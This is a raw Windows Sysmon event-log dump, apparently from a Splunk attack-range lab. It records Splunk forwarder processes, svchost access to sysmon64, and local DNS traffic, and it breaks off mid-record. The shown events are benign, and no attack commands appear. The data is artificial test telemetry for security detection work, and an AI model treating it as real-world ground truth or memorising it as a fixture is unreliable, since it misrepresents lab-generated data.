AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000286865Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:48.760{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F21336E132B5BCE9C7BA1F3609A75AE8,SHA256=31EA4818A59AE7312D62B75AB5C447A0D621FF705C14F87DA9EB6335F0F1234C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215787Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:48.651{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4CDA231E9F5453B56D120FC37E7B3842,SHA256=5762269922F52F31826D92756B8C5FA27746FD2B35FA9F5CF0431A1D8D7AAC34,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000286864Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:45.421{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51848- 354300x8000000000000000286863Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:45.393{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local51848- 10341000x8000000000000000215786Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:48.541{4F8D34B0-105C-6216-3704-000000003902}7123456C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000215785Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:48.401{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1F3E0F3841377C842B541F4FC8E8A3EC,SHA256=25DF88E2A9D1C18A53D317805157C94EEEE0438B00377D49533245944D6A21AB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000215784Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:48.057{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-105C-6216-3704-000000003902}712C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215783Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:48.057{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-105C-6216-3704-000000003902}712C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215782Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:48.057{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-105C-6216-3704-000000003902}712C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215781Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:48.057{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215780Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:48.057{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215779Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:48.057{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215778Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:48.057{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215777Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:48.057{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215776Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:48.057{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215775Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:48.057{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215774Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:48.057{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215773Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:48.057{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215772Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:48.058{4F8D34B0-105C-6216-3704-000000003902}712C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000286866Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:49.823{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D1B43568B098E810C4AE9CC976A295C,SHA256=87A62EE952C91DFA61731FE595C97F395840ECF278E4D3DBD76E84052593619A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000215815Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:49.854{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-105D-6216-3904-000000003902}3564C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215814Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:49.854{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215813Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:49.854{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215812Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:49.854{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215811Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:49.854{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215810Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:49.854{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215809Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:49.854{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215808Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:49.854{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215807Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:49.854{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215806Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 